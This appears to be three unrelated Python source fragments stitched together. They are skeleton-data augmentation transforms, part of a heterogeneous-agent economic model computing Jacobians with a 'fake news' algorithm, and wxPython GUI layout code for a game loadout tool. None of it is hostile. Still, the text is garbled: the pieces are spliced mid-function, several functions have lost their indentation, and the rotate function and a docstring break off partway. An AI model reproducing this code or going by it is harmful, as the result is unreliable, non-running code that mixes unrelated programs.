    """Add i.i.d. Gaussian noise to every entry of a (C, T, V, M) array.

    Returns a new array; the input is left untouched.
    """

    def __init__(self, mean=0, std=0.05):
        self.mean = mean
        self.std = std

    def __call__(self, data_numpy):
        noise = np.random.normal(loc=self.mean, scale=self.std,
                                 size=data_numpy.shape)
        return data_numpy.copy() + noise
class Gaus_filter(object):
    """Gaussian smoothing of skeleton data via a GaussianBlurConv helper.

    GaussianBlurConv is not defined in this file; presumably a depthwise
    conv over 3 channels with the given kernel size and a sigma drawn from
    sig_list — TODO confirm against its definition.
    """

    def __init__(self, kernel=15, sig_list=[0.1, 2]):
        # NOTE(review): mutable default argument; harmless here only because
        # sig_list is passed straight through and never mutated in this block.
        self.g = GaussianBlurConv(3, kernel, sig_list)

    def __call__(self, data_numpy):
        # delegate entirely to the pre-built blur module
        return self.g(data_numpy)
class Shear(object):
    """Apply a random (or fixed) 3D shear to all coordinates.

    The shear matrix has unit diagonal; s1 fills the lower off-diagonals'
    counterpart and s2 the remaining entries (see construction below).

    :param s1: list of 3 shear factors, or None to draw each from U(-1, 1)
        per call.
    :param s2: list of 3 shear factors, or None to draw each from U(-1, 1)
        per call.

    Fix: `!= None` -> `is not None`.
    """

    def __init__(self, s1=None, s2=None):
        self.s1 = s1
        self.s2 = s2

    def __call__(self, data_numpy):
        if self.s1 is not None:
            s1_list = self.s1
        else:
            s1_list = [random.uniform(-1, 1) for _ in range(3)]
        if self.s2 is not None:
            s2_list = self.s2
        else:
            s2_list = [random.uniform(-1, 1) for _ in range(3)]

        R = np.array([[1, s1_list[0], s2_list[0]],
                      [s1_list[1], 1, s2_list[1]],
                      [s1_list[2], s2_list[2], 1]]).transpose()
        # move channel axis last, shear on the right, move it back
        sheared = np.dot(data_numpy.copy().transpose([1, 2, 3, 0]), R)
        return sheared.transpose(3, 0, 1, 2)
class Diff(object):
    """First-order temporal difference over all channels.

    out[:, t] = x[:, t+1] - x[:, t] for t < T-1; the last frame is zero.
    The per-frame Python loop is replaced by an equivalent vectorized
    slice subtraction. Output is float64 (np.zeros buffer), as before.
    """

    def __call__(self, data_numpy):
        C, T, V, M = data_numpy.shape
        x_new = np.zeros((C, T, V, M))
        x_new[:, :-1, :, :] = data_numpy[:, 1:, :, :] - data_numpy[:, :-1, :, :]
        return x_new
'''========================================================'''
# ok
def subtract(data_numpy, joint):
    """Re-center a (C, T, V, M) skeleton on joint `joint`.

    Functional counterpart of the Subtract transform. The per-joint Python
    loop is replaced with an equivalent broadcast subtraction; the result
    is float64 regardless of input dtype (np.zeros buffer), as before.

    :param data_numpy: array of shape (C, T, V, M)
    :param joint: index of the reference joint
    :return: new float64 array with joint `joint` at the origin
    """
    x_new = np.zeros(data_numpy.shape)
    x_new[:] = data_numpy - data_numpy[:, :, joint:joint + 1, :]
    return x_new
# ok
# b: crop and resize
def subsample(data_numpy, time_range):
    """Keep a subset of frames of a (C, T, V, M) array, zeroing the rest.

    :param time_range: either an int (that many frames are sampled at
        random) or an explicit sequence of frame indices to keep
    :return: new float64 array; kept frames copied, all others zero
    """
    C, T, V, M = data_numpy.shape
    if isinstance(time_range, int):
        time_range = sorted(random.sample(range(T), time_range))
    x_new = np.zeros((C, T, V, M))
    x_new[:, time_range, :, :] = data_numpy[:, time_range, :, :]
    return x_new
# ok
# c: crop,resize (and flip)
def subSampleFlip(data_numpy, time_range):
    """Sample frames, then write them back in reversed temporal order.

    :param time_range: either an int (sample that many random frames) or an
        explicit sequence of frame indices
    :return: new float64 array where the selected frame positions hold the
        selected frames in reverse order; unselected frames are zero

    Fixes: with a list-valued `time_range` the original raised NameError
    (`time_range_order` was only assigned inside the `isinstance(int)`
    branch) and the leading `assert T >= time_range` compared a list to an
    int; the ordering is now computed for both input kinds and the length
    check only applies to the int form.
    """
    C, T, V, M = data_numpy.shape
    if isinstance(time_range, int):
        assert T >= time_range, "frames longer than data"
        time_range = random.sample(range(T), time_range)
    time_range_order = sorted(time_range)
    time_range_reverse = list(reversed(time_range_order))
    x_new = np.zeros((C, T, V, M))
    x_new[:, time_range_order, :, :] = data_numpy[:, time_range_reverse, :, :]
    return x_new
# ok
# d: color distort.(drop)
def zero_out_axis(data_numpy, axis):
    """Return a copy of (C, T, V, M) data with one coordinate channel zeroed.

    :param axis: channel index (0=x, 1=y, 2=z)
    """
    out = data_numpy.copy()
    out[axis] = 0
    return out
# ok
# e: color distort. (jitter)
def diff_on_axis(data_numpy, axis):
    """Replace channel `axis` with its first temporal difference.

    out[axis, t] = x[axis, t+1] - x[axis, t], last frame zeroed; other
    channels are untouched. The per-frame Python loop is replaced by an
    equivalent vectorized slice subtraction.
    """
    temp = data_numpy.copy()
    temp[axis, :-1] = data_numpy[axis, 1:] - data_numpy[axis, :-1]
    temp[axis, -1] = 0
    return temp
# ok
# f: rotate
def rotate(data_numpy, axis, angle):
temp = data_numpy.copy()
angle = math.radians(angle)
| |
: [optional] int
maximum number of iterations, if 'tol' not reached by then, raise error
D_seed : [optional] array
initial seed for overall distribution
pi_seed : [optional] array
initial seed for stationary dist of Pi, if no D_seed
Returns
----------
D : array
steady-state distribution
"""
# first obtain initial distribution D
if D_seed is None:
# compute stationary distribution for exogenous variable
pi = utils.stationary(Pi, pi_seed)
# now initialize full distribution with this, assuming uniform distribution on endogenous vars
endogenous_dims = [grid[k].shape[0] for k in self.policy]
D = np.tile(pi, endogenous_dims[::-1] + [1]).T / np.prod(endogenous_dims)
else:
D = D_seed
# obtain interpolated policy rule for each dimension of endogenous policy
sspol_i = {}
sspol_pi = {}
for pol in self.policy:
# use robust binary search-based method that only requires grids, not policies, to be monotonic
sspol_i[pol], sspol_pi[pol] = utils.interpolate_coord_robust(grid[pol], sspol[pol])
# iterate until convergence by tol, or maxit
Pi_T = Pi.T.copy()
for it in range(maxit):
Dnew = self.forward_step(D, Pi_T, sspol_i, sspol_pi)
# only check convergence every 10 iterations for efficiency
if it % 10 == 0 and utils.within_tolerance(D, Dnew, tol):
break
D = Dnew
else:
raise ValueError(f'No convergence after {maxit} forward iterations!')
return D
'''Part 4: components of jac(), corresponding to *4 steps of fake news algorithm* in paper
- Step 1: backward_step_fakenews and backward_iteration_fakenews to get curlyYs and curlyDs
- Step 2: forward_iteration_fakenews to get curlyPs
- Step 3: build_F to get fake news matrix from curlyYs, curlyDs, curlyPs
- Step 4: J_from_F to get Jacobian from fake news matrix
'''
def backward_step_fakenews(self, din_dict, output_list, ssin_dict, ssout_list,
                           Dss, Pi_T, sspol_i, sspol_pi, sspol_space, h=1E-4):
    """One backward step of the fake news algorithm (step 1 in the paper).

    Numerically differentiates self.back_step_fun around the steady state
    with respect to the perturbation din_dict, then propagates that
    one-period shock to (a) next period's distribution and (b) today's
    aggregate outputs.

    Parameters (steady-state objects as produced by jac_prelim):
        din_dict    : dict, perturbation to backward-step inputs (unit-scaled)
        output_list : list, names of outputs whose aggregate response is wanted
        ssin_dict   : dict, steady-state inputs to back_step_fun
        ssout_list  : tuple, steady-state outputs of back_step_fun
        Dss         : array, steady-state distribution
        Pi_T        : array, transposed Markov matrix for the exogenous state
        sspol_i     : dict, lower-gridpoint indices of ss policy
        sspol_pi    : dict, lower-gridpoint weights of ss policy
        sspol_space : dict, spacing between bracketing gridpoints
        h           : float, step size for numerical differentiation

    Returns:
        curlyV : dict, responses of backward variables (feed into next step)
        curlyD : array, response of next period's distribution
        curlyY : dict, impact responses of each output in output_list
    """
    # shock perturbs outputs
    shocked_outputs = {k: v for k, v in zip(self.all_outputs_order,
                                            utils.numerical_diff(self.back_step_fun, ssin_dict, din_dict, h,
                                                                 ssout_list))}
    curlyV = {k: shocked_outputs[k] for k in self.backward}

    # which affects the distribution tomorrow
    # minus sign: a policy increase shifts interpolation weight off the lower
    # gridpoint, and the shift is normalized by the local gridpoint spacing
    pol_pi_shock = {k: -shocked_outputs[k]/sspol_space[k] for k in self.policy}
    curlyD = self.forward_step_shock(Dss, Pi_T, sspol_i, sspol_pi, pol_pi_shock)

    # and the aggregate outcomes today (expectation of shocked output under Dss)
    curlyY = {k: np.vdot(Dss, shocked_outputs[k]) for k in output_list}

    return curlyV, curlyD, curlyY
def backward_iteration_fakenews(self, input_shocked, output_list, ssin_dict, ssout_list, Dss, Pi_T,
                                sspol_i, sspol_pi, sspol_space, T, h=1E-4, ss_for_hetinput=None):
    """Iterate policy steps backward T times for a single shock.

    Produces the date-0 news terms of the fake news algorithm: curlyYs[k][t]
    is the response of aggregate output k to news at horizon t, and
    curlyDs[t] the corresponding response of next period's distribution.
    """
    if self.hetinput is not None and input_shocked in self.hetinput_inputs:
        # if input_shocked is an input to hetinput, take numerical diff to get response
        din_dict = dict(zip(self.hetinput_outputs_order,
                            utils.numerical_diff_symmetric(self.hetinput, ss_for_hetinput, {input_shocked: 1}, h)))
    else:
        # otherwise, we just have that one shock
        din_dict = {input_shocked: 1}

    # contemporaneous response to unit scalar shock
    curlyV, curlyD, curlyY = self.backward_step_fakenews(din_dict, output_list, ssin_dict, ssout_list,
                                                        Dss, Pi_T, sspol_i, sspol_pi, sspol_space, h)

    # infer dimensions from this and initialize empty arrays
    curlyDs = np.empty((T,) + curlyD.shape)
    curlyYs = {k: np.empty(T) for k in curlyY.keys()}

    # fill in current effect of shock
    curlyDs[0, ...] = curlyD
    for k in curlyY.keys():
        curlyYs[k][0] = curlyY[k]

    # fill in anticipation effects: feed last step's backward responses in as
    # perturbations to next period's ('_p'-suffixed) inputs and step again
    for t in range(1, T):
        curlyV, curlyDs[t, ...], curlyY = self.backward_step_fakenews({k+'_p': v for k, v in curlyV.items()},
                                                                      output_list, ssin_dict, ssout_list,
                                                                      Dss, Pi_T, sspol_i, sspol_pi, sspol_space, h)
        for k in curlyY.keys():
            curlyYs[k][t] = curlyY[k]

    return curlyYs, curlyDs
def forward_iteration_fakenews(self, o_ss, Pi, pol_i_ss, pol_pi_ss, T):
    """Iterate transpose forward T steps to get full set of curlyPs for a given outcome.

    Note we depart from definition in paper by applying the demeaning operator in addition to Lambda
    at each step. This does not affect products with curlyD (which are the only way curlyPs enter
    Jacobian) since perturbations to distribution always have mean zero. It has numerical benefits
    since curlyPs now go to zero for high t (used in paper in proof of Proposition 1).

    o_ss : array, steady-state value of the outcome on the state space
    Returns array of shape (T,) + o_ss.shape, curlyPs[t] = demeaned E_t[o].
    """
    curlyPs = np.empty((T,) + o_ss.shape)
    # t = 0: the (demeaned) outcome itself
    curlyPs[0, ...] = utils.demean(o_ss)
    for t in range(1, T):
        # each step applies the transpose transition (expectation operator),
        # then demeans for numerical decay at large t (see docstring)
        curlyPs[t, ...] = utils.demean(self.forward_step_transpose(curlyPs[t-1, ...], Pi, pol_i_ss, pol_pi_ss))
    return curlyPs
@staticmethod
def build_F(curlyYs, curlyDs, curlyPs):
T = curlyDs.shape[0]
Tpost = curlyPs.shape[0] - T + 2
F = np.empty((Tpost + T - 1, T))
F[0, :] = curlyYs
F[1:, :] = curlyPs.reshape((Tpost + T - 2, -1)) @ curlyDs.reshape((T, -1)).T
return F
@staticmethod
def J_from_F(F):
J = F.copy()
for t in range(1, J.shape[1]):
J[1:, t] += J[:-1, t - 1]
return J
'''Part 5: helpers for .jac and .ajac: preliminary processing and clearing saved info'''
def jac_prelim(self, ss, save=False, use_saved=False):
    """Helper that does preliminary processing of steady state for fake news algorithm.

    Parameters
    ----------
    ss : dict, all steady-state info, intended to be from .ss()
    save : [optional] bool, whether to store results in .prelim_saved attribute
    use_saved : [optional] bool, whether to use already-stored results in .prelim_saved

    Returns
    ----------
    ssin_dict : dict, ss vals of exactly the inputs needed by self.back_step_fun for backward step
    Pi : array (S*S), Markov matrix for exogenous state
    ssout_list : tuple, what self.back_step_fun returns when given ssin_dict (not exactly the same
                    as steady-state numerically since SS convergence was to some tolerance threshold)
    ss_for_hetinput : dict, ss vals of exactly the inputs needed by self.hetinput (if it exists)
    sspol_i : dict, indices on lower bracketing gridpoint for all in self.policy
    sspol_pi : dict, weights on lower bracketing gridpoint for all in self.policy
    sspol_space : dict, space between lower and upper bracketing gridpoints for all in self.policy
    """
    # fixed ordering shared by the saved dict and the returned tuple
    output_names = ('ssin_dict', 'Pi', 'ssout_list',
                    'ss_for_hetinput', 'sspol_i', 'sspol_pi', 'sspol_space')

    if use_saved:
        if self.prelim_saved:
            return tuple(self.prelim_saved[k] for k in output_names)
        else:
            raise ValueError('Nothing saved to be used by jac_prelim!')

    # preliminary a: obtain ss inputs and other info, run once to get baseline for numerical differentiation
    ssin_dict = self.make_inputs(ss)
    Pi = ss[self.exogenous]
    grid = {k: ss[k+'_grid'] for k in self.policy}
    ssout_list = self.back_step_fun(**ssin_dict)

    ss_for_hetinput = None
    if self.hetinput is not None:
        ss_for_hetinput = {k: ss[k] for k in self.hetinput_inputs if k in ss}

    # preliminary b: get sparse representations of policy rules, and distance between neighboring policy gridpoints
    sspol_i = {}
    sspol_pi = {}
    sspol_space = {}
    for pol in self.policy:
        # use robust binary-search-based method that only requires grids to be monotonic
        sspol_i[pol], sspol_pi[pol] = utils.interpolate_coord_robust(grid[pol], ss[pol])
        # spacing used to normalize policy shocks into weight shocks
        sspol_space[pol] = grid[pol][sspol_i[pol]+1] - grid[pol][sspol_i[pol]]

    toreturn = (ssin_dict, Pi, ssout_list, ss_for_hetinput, sspol_i, sspol_pi, sspol_space)
    if save:
        self.prelim_saved = {k: v for (k, v) in zip(output_names, toreturn)}

    return toreturn
def clear_saved(self):
    """Reset all cached .jac/.ajac results (e.g. after the steady state changes)."""
    self.saved_shock_list = []
    self.saved_output_list = []
    self.saved = {}
    self.prelim_saved = {}
'''Part 6: helper to extract inputs and potentially process them through hetinput'''
def make_inputs(self, indict):
    """Extract from indict exactly the inputs needed for self.back_step_fun,
    process stuff through hetinput first if it's there.

    Returns a dict whose lagged ('_p'-suffixed) entries are filled from the
    unsuffixed values in indict; raises KeyError (after printing which name
    is missing) if a required backward variable or Markov matrix is absent.
    """
    # NOTE(review): when hetinput exists this mutates the caller's indict in
    # place via .update() — looks intentional (callers reuse the enriched ss
    # dict), but confirm before relying on indict being unmodified
    if self.hetinput is not None:
        outputs_as_tuple = utils.make_tuple(self.hetinput(**{k: indict[k] for k in self.hetinput_inputs if k in indict}))
        indict.update(dict(zip(self.hetinput_outputs_order, outputs_as_tuple)))

    # non-lagged inputs: everything back_step_fun needs except the '_p' set
    indict_new = {k: indict[k] for k in self.all_inputs - self.inputs_p if k in indict}
    try:
        return {**indict_new, **{k + '_p': indict[k] for k in self.inputs_p}}
    except KeyError as e:
        print(f'Missing backward variable or Markov matrix {e} for {self.back_step_fun.__name__}!')
        raise
'''Part 7: routines to do forward steps of different kinds, all wrap functions in utils'''
def forward_step(self, D, Pi_T, pol_i, pol_pi):
    """Update distribution, calling on 1d and 2d-specific compiled routines.

    Parameters
    ----------
    D : array, beginning-of-period distribution
    Pi_T : array, transpose Markov matrix
    pol_i : dict, indices on lower bracketing gridpoint for all in self.policy
    pol_pi : dict, weights on lower bracketing gridpoint for all in self.policy

    Returns
    ----------
    Dnew : array, beginning-of-next-period distribution
    """
    n_pol = len(self.policy)
    if n_pol == 1:
        (pol,) = self.policy
        return utils.forward_step_1d(D, Pi_T, pol_i[pol], pol_pi[pol])
    if n_pol == 2:
        first, second = self.policy
        return utils.forward_step_2d(D, Pi_T, pol_i[first], pol_i[second],
                                     pol_pi[first], pol_pi[second])
    raise ValueError(f"{len(self.policy)} policy variables, only up to 2 implemented!")
def forward_step_transpose(self, D, Pi, pol_i, pol_pi):
"""Transpose of forward_step (note: this takes Pi rather than Pi_T as argument!)"""
if len(self.policy) == 1:
p, = self.policy
return utils.forward_step_transpose_1d(D, Pi, pol_i[p], pol_pi[p])
elif len(self.policy) == 2:
p1, p2 = self.policy
return utils.forward_step_transpose_2d(D, Pi, pol_i[p1], pol_i[p2], pol_pi[p1], | |
wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_SIMPLE )
self.m_panel_partselect_cm1.SetBackgroundColour( wx.Colour( 0, 64, 128 ) )
bSizerPSCM1 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bmToggleBtn_blrlm_camo = wx.BitmapToggleButton( self.m_panel_partselect_cm1, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.Size( 32,32 ), wx.BORDER_NONE )
self.m_bmToggleBtn_blrlm_camo.SetBitmap( wx.NullBitmap )
self.m_bmToggleBtn_blrlm_camo.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
bSizerPSCM1.Add( self.m_bmToggleBtn_blrlm_camo, 0, wx.ALL, 0 )
self.m_bitmap_blrlm_camo = wx.StaticBitmap( self.m_panel_partselect_cm1, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_bitmap_blrlm_camo.SetMinSize( wx.Size( 64,32 ) )
self.m_bitmap_blrlm_camo.SetMaxSize( wx.Size( 64,32 ) )
bSizerPSCM1.Add( self.m_bitmap_blrlm_camo, 0, wx.LEFT|wx.RIGHT, 8 )
self.m_staticText_blrlm_camo = wx.StaticText( self.m_panel_partselect_cm1, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_blrlm_camo.Wrap( -1 )
self.m_staticText_blrlm_camo.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_HIGHLIGHTTEXT ) )
bSizerPSCM1.Add( self.m_staticText_blrlm_camo, 1, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 0 )
self.m_bpButton_blrlm_camo_reset = wx.BitmapButton( self.m_panel_partselect_cm1, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.Size( 32,32 ), wx.BU_AUTODRAW|0|wx.BORDER_NONE )
self.m_bpButton_blrlm_camo_reset.SetBackgroundColour( wx.Colour( 0, 64, 128 ) )
bSizerPSCM1.Add( self.m_bpButton_blrlm_camo_reset, 0, wx.ALL, 0 )
self.m_panel_partselect_cm1.SetSizer( bSizerPSCM1 )
self.m_panel_partselect_cm1.Layout()
bSizerPSCM1.Fit( self.m_panel_partselect_cm1 )
bSizerPartSelect.Add( self.m_panel_partselect_cm1, 0, wx.EXPAND |wx.ALL, 4 )
self.m_panel14 = PartSelectPanel( self.m_panel_partselect, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_SIMPLE )
bSizerPartSelect.Add( self.m_panel14, 0, wx.EXPAND |wx.ALL, 4 )
bSizer19.Add( bSizerPartSelect, 0, wx.EXPAND, 0 )
bSizer22 = wx.BoxSizer( wx.VERTICAL )
bSizer24 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bmToggleBtnLoadout1 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnLoadout1.SetValue( True )
self.m_bmToggleBtnLoadout1.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnLoadout1.Enable( False )
self.m_bmToggleBtnLoadout1.SetMinSize( wx.Size( 130,24 ) )
bSizer24.Add( self.m_bmToggleBtnLoadout1, 0, wx.LEFT|wx.RIGHT, 2 )
bSizer24.Add( ( 0, 0), 1, wx.EXPAND, 5 )
self.m_bmToggleBtnLoadout2 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnLoadout2.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnLoadout2.Enable( False )
self.m_bmToggleBtnLoadout2.SetMinSize( wx.Size( 130,24 ) )
bSizer24.Add( self.m_bmToggleBtnLoadout2, 0, wx.LEFT|wx.RIGHT, 2 )
bSizer24.Add( ( 0, 0), 1, wx.EXPAND, 5 )
self.m_bmToggleBtnLoadout3 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnLoadout3.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnLoadout3.Enable( False )
self.m_bmToggleBtnLoadout3.SetMinSize( wx.Size( 130,24 ) )
bSizer24.Add( self.m_bmToggleBtnLoadout3, 0, wx.LEFT|wx.RIGHT, 2 )
bSizer22.Add( bSizer24, 0, wx.EXPAND, 0 )
bSizer21 = wx.BoxSizer( wx.HORIZONTAL )
bSizer221 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bmToggleBtnPrimary1 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnPrimary1.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnPrimary1.SetMinSize( wx.Size( 64,64 ) )
bSizer221.Add( self.m_bmToggleBtnPrimary1, 0, wx.LEFT|wx.RIGHT|wx.TOP, 2 )
self.m_bmToggleBtnSecondary1 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnSecondary1.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnSecondary1.SetMinSize( wx.Size( 64,64 ) )
bSizer221.Add( self.m_bmToggleBtnSecondary1, 0, wx.BOTTOM|wx.RIGHT|wx.TOP, 2 )
bSizer21.Add( bSizer221, 0, wx.EXPAND, 5 )
bSizer21.Add( ( 0, 0), 1, wx.EXPAND, 5 )
bSizer211 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bmToggleBtnPrimary2 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnPrimary2.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnPrimary2.SetMinSize( wx.Size( 64,64 ) )
bSizer211.Add( self.m_bmToggleBtnPrimary2, 0, wx.LEFT|wx.RIGHT|wx.TOP, 2 )
self.m_bmToggleBtnSecondary2 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnSecondary2.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnSecondary2.SetMinSize( wx.Size( 64,64 ) )
bSizer211.Add( self.m_bmToggleBtnSecondary2, 0, wx.BOTTOM|wx.RIGHT|wx.TOP, 2 )
bSizer21.Add( bSizer211, 0, wx.EXPAND, 5 )
bSizer21.Add( ( 0, 0), 1, wx.EXPAND, 5 )
bSizer2111 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bmToggleBtnPrimary3 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnPrimary3.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnPrimary3.SetMinSize( wx.Size( 64,64 ) )
bSizer2111.Add( self.m_bmToggleBtnPrimary3, 0, wx.LEFT|wx.RIGHT|wx.TOP, 2 )
self.m_bmToggleBtnSecondary3 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnSecondary3.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnSecondary3.SetMinSize( wx.Size( 64,64 ) )
bSizer2111.Add( self.m_bmToggleBtnSecondary3, 0, wx.BOTTOM|wx.RIGHT|wx.TOP, 2 )
bSizer21.Add( bSizer2111, 0, wx.EXPAND, 5 )
bSizer22.Add( bSizer21, 1, wx.EXPAND, 5 )
bSizer19.Add( bSizer22, 0, wx.ALL|wx.EXPAND, 4 )
self.m_panel_partselect.SetSizer( bSizer19 )
self.m_panel_partselect.Layout()
bSizer19.Fit( self.m_panel_partselect )
bSizer3.Add( self.m_panel_partselect, 1, wx.EXPAND |wx.ALL, 8 )
bSizer_blrlm_main.Add( bSizer3, 0, wx.EXPAND, 0 )
bSizer10 = wx.BoxSizer( wx.VERTICAL )
self.m_listCtrl_blrlm_selector = wx.ListCtrl( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_HRULES|wx.LC_REPORT|wx.LC_SINGLE_SEL|wx.BORDER_SIMPLE )
self.m_listCtrl_blrlm_selector.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOWTEXT ) )
self.m_listCtrl_blrlm_selector.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_listCtrl_blrlm_selector.SetMinSize( wx.Size( 720,480 ) )
bSizer10.Add( self.m_listCtrl_blrlm_selector, 1, wx.BOTTOM|wx.EXPAND|wx.RIGHT|wx.TOP, 8 )
self.m_panel11 = BitmapPanel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_STATIC )
bSizer11 = wx.BoxSizer( wx.HORIZONTAL )
bSizer14 = wx.BoxSizer( wx.VERTICAL )
bSizer12 = wx.BoxSizer( wx.HORIZONTAL )
self.m_staticText6 = wx.StaticText( self.m_panel11, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText6.Wrap( -1 )
self.m_staticText6.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_HIGHLIGHTTEXT ) )
bSizer12.Add( self.m_staticText6, 0, wx.LEFT, 4 )
bSizer14.Add( bSizer12, 1, wx.EXPAND, 5 )
bSizer11.Add( bSizer14, 1, wx.EXPAND, 5 )
bSizer15 = wx.BoxSizer( wx.HORIZONTAL )
bSizer15.SetMinSize( wx.Size( 512,-1 ) )
self.m_panel121 = wx.Panel( self.m_panel11, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
self.m_panel121.Enable( False )
self.m_panel121.Hide()
bSizer121 = wx.BoxSizer( wx.HORIZONTAL )
self.m_staticText61 = wx.StaticText( self.m_panel121, wx.ID_ANY, u"Export Path:", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText61.Wrap( -1 )
self.m_staticText61.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_HIGHLIGHTTEXT ) )
self.m_staticText61.Enable( False )
self.m_staticText61.Hide()
bSizer121.Add( self.m_staticText61, 0, wx.ALIGN_CENTER_VERTICAL|wx.LEFT, 4 )
self.m_dirPicker1 = wx.DirPickerCtrl( self.m_panel121, wx.ID_ANY, wx.EmptyString, u"Select a folder", wx.DefaultPosition, wx.DefaultSize, wx.DIRP_DIR_MUST_EXIST|wx.DIRP_USE_TEXTCTRL )
self.m_dirPicker1.Enable( False )
self.m_dirPicker1.Hide()
bSizer121.Add( self.m_dirPicker1, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 4 )
self.m_button_export_loadout = wx.Button( self.m_panel121, wx.ID_ANY, u"Generate Loadout", wx.DefaultPosition, wx.DefaultSize, 0|wx.BORDER_THEME )
bSizer121.Add( self.m_button_export_loadout, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 4 )
self.m_panel121.SetSizer( bSizer121 )
self.m_panel121.Layout()
bSizer121.Fit( self.m_panel121 )
bSizer15.Add( self.m_panel121, 0, wx.ALL, 4 )
self.m_scintilla1 = wx.stc.StyledTextCtrl( self.m_panel11, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0)
self.m_scintilla1.SetUseTabs ( False )
self.m_scintilla1.SetTabWidth ( 4 )
self.m_scintilla1.SetIndent ( 4 )
self.m_scintilla1.SetTabIndents( True )
self.m_scintilla1.SetBackSpaceUnIndents( True )
self.m_scintilla1.SetViewEOL( False )
self.m_scintilla1.SetViewWhiteSpace( False )
self.m_scintilla1.SetMarginWidth( 2, 0 )
self.m_scintilla1.SetIndentationGuides( False )
self.m_scintilla1.SetReadOnly( False );
self.m_scintilla1.SetMarginWidth( 1, 0 )
self.m_scintilla1.SetMarginWidth ( 0, 0 )
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDER, wx.stc.STC_MARK_BOXPLUS )
self.m_scintilla1.MarkerSetBackground( wx.stc.STC_MARKNUM_FOLDER, wx.BLACK)
self.m_scintilla1.MarkerSetForeground( wx.stc.STC_MARKNUM_FOLDER, wx.WHITE)
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDEROPEN, wx.stc.STC_MARK_BOXMINUS )
self.m_scintilla1.MarkerSetBackground( wx.stc.STC_MARKNUM_FOLDEROPEN, wx.BLACK )
self.m_scintilla1.MarkerSetForeground( wx.stc.STC_MARKNUM_FOLDEROPEN, wx.WHITE )
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDERSUB, wx.stc.STC_MARK_EMPTY )
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDEREND, wx.stc.STC_MARK_BOXPLUS )
self.m_scintilla1.MarkerSetBackground( wx.stc.STC_MARKNUM_FOLDEREND, wx.BLACK )
self.m_scintilla1.MarkerSetForeground( wx.stc.STC_MARKNUM_FOLDEREND, wx.WHITE )
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDEROPENMID, wx.stc.STC_MARK_BOXMINUS )
self.m_scintilla1.MarkerSetBackground( wx.stc.STC_MARKNUM_FOLDEROPENMID, wx.BLACK)
